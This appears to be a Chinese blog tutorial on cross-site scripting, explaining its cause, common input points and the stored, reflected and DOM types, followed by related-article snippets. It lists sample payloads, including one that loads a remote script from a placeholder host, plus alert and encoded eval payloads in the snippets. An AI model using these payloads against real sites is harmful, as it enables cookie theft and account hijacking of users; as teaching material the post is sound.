XSS跨站脚本攻击

最新推荐文章于 2024-08-17 13:47:06 发布
最新推荐文章于 2024-08-17 13:47:06 发布
阅读量136 收藏
点赞数
分类专栏: web安全 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/frinck/article/details/101124744
版权
XSS跨站脚本攻击是由于网站未充分过滤用户输入,导致恶意代码执行,影响其他用户的安全。分为存储型、反射型和DOM型,其中存储型危害最大。攻击者利用XSS可以盗取用户cookie和资料。了解其原理、常见场景和分类对于提升网站安全性至关重要。
摘要由CSDN通过智能技术生成

XSS跨站脚本攻击

1.简介

XSS(Cross Site Scripting)跨站脚本攻击是利用系统对恶意用户的输入影响其他用户HTML的过滤不足,导致执行恶意用户的的代码.从而盗取用户cookie,用户资料等威胁.

2.整体框架

在这里插入图片描述

2.1XSS的发现与利用


2.1.1原理:网站未对用户的输入进行过滤

2.1.2常见场景:
		有回复框的地方都可能存在xss
1.搜索内容
2.发表文章的网页
3.邮件系统
4.留言,评论回复
2.1.3XSS分类:
存储型
反射型
DOM型

①存储型:
在所有类型的xss中存储型的危害是最大的,它存储在服务器当中,每次用户访问当前页面都会执行此xss.他可以被管理员看见,并且还可以提交内容.
②反射型
具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。也就是说想要触发漏洞,需要访问特定的链接才能够实现。
③DOM型
DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。

2.1.4XSS常见playload:
<script>alert(1)</script>
<img src="http://abc/xss/a.js">
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js' ";>

在这里插入图片描述

2.1.5XSS注入点:
在标签内<div>xss test</div>
在属性内:<input type="text" name="content" value="xss test" />
可以输入“x>xss test ”来进行测试
frinck
关注
专栏目录
跨站脚本攻击实现原理
一个大龄码农的专栏
12-09 1568
跨站脚本攻击Cross-site scripting是个比较老的漏洞攻击方法,今天对其了解了下。 它是如何实现的呢,假设有个表单需要提交,其中某个字段形如 攻击者在此输入框填写了 " />alert('xss') value=" 这样的内容提交到服务器,而服务器没有进行过滤处理,将其存入数据库,下次编辑此表单时服务器对此内容输出,raw的
XSS跨站脚本攻击原理
m0re's blog
03-21 1072
XSS简介 跨站脚本(cross site script)为了避免与样式CSS混淆,所以简称xssxss是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。 xss是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某种动作,或者对访问者进...
跨站脚本攻击原理、攻击过程及防御方法简介
seek_2022的博客
05-03 8855
文章目录一、XSS简介(一)什么是XSS?(二)XSS的危害(三)XSS的分类(四)XSS的特性(五)XSS攻击过程二、如何防御XSS攻击?三、本文小结 一、XSS简介 (一)什么是XSS? Cross-Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。通常安全圈内的人喜欢称其为前端注入。 前端注入:用户输入的数据被当做前端代码执行(一般是当做JS代码执行)。 前端的三种代码中,出现XSS漏洞时,90%的情况下,注入的代码是被当
详解XSS跨站脚本攻击原理及防御
杜小白的博客
04-21 7648
一、XSS跨站脚本攻击跨站脚本攻击,英文全称是Cross Site Script,本来缩写是CSS,但是为了和层叠样式表CSS有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“s跨站脚本”。但是发展到今天,由于javascript的强大功能以...
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS bypass思路及payload
Yty_819109的博客
05-30 739
xss bypass姿势
XSS payload大全
01-22
总结的XSS的payload,可以直接使用,直接进行攻击,各种payload
xss常用Payload总结
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
XSS Playload 学习浏览器解码
lml_0916的博客
07-25 1376
通过网上的编码解析器可以查到“%6a%61%76%61%73%63%72%69%70%74%61%6c%65%72%74%28%31%29”这里采用URL编码的方式将javascriptalert(1)转成了上面的样子。js能识别的是Unicode编码,也能识别16进制编码,但是在js中不可以编码符号,所以这个也是不可以识别的,也就是说,咱们点击button按钮的时候是不会跳出弹窗的。这里采用的是js编码,使用的js的Unicode,并且他没有编码符号,所以是可以进行弹窗的。...
反射型XSS的几种payload
最新发布
m0_70638961的博客
08-17 668
符合web的解码顺序,所以可以被执行。和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
XSS跨站脚本攻击)原理详解(内含攻击实例)
qq_52642385的博客
07-05 7036
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所写的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器会
XSS常用Payload
z2560088的博客
01-11 9832
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
xss跳转代码_XSS(跨站脚本攻击)
weixin_39564831的博客
11-20 1777
XSS攻击流程 1、攻击者将恶意代码注入到服务器中 2、用户在没有防备的情况下访问服务器 3、服务器将含有恶意代码的网页响应给客户端 4、在客户端浏览器中触发恶意的JS代码XSS危害 1、盗取各种用户账号 2、窃取用户Cookie资料,冒充用户身份进入网站 3、劫持用户会话,执行任意操作 4、刷流量,执行弹窗广告 5、传播病毒XSS漏洞的验证 POC 漏洞的验证与检测 E...
XSS的漏洞测试案例
weixin_51446936的博客
06-01 2234
1、获取cookie的原理和实验演示 《get型xss》 第一步:搭建xss的后台 打开pikachu xss的后台管理工具(在pikachu漏洞平台底部---->管理工具----->xss后台) 根据提示进行安装,修改配置文件,即数据库的账户和密码 接下来,根据提示进行安装/初始化,然后进行登录 后台登录成功 现在xss后台没有任何数据 第二步:先将pikachu中cookie.php改为自己本地的ip,重定向到一个可信的网站,我的ip如下 路径为:D:\phpstudy2018\P
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值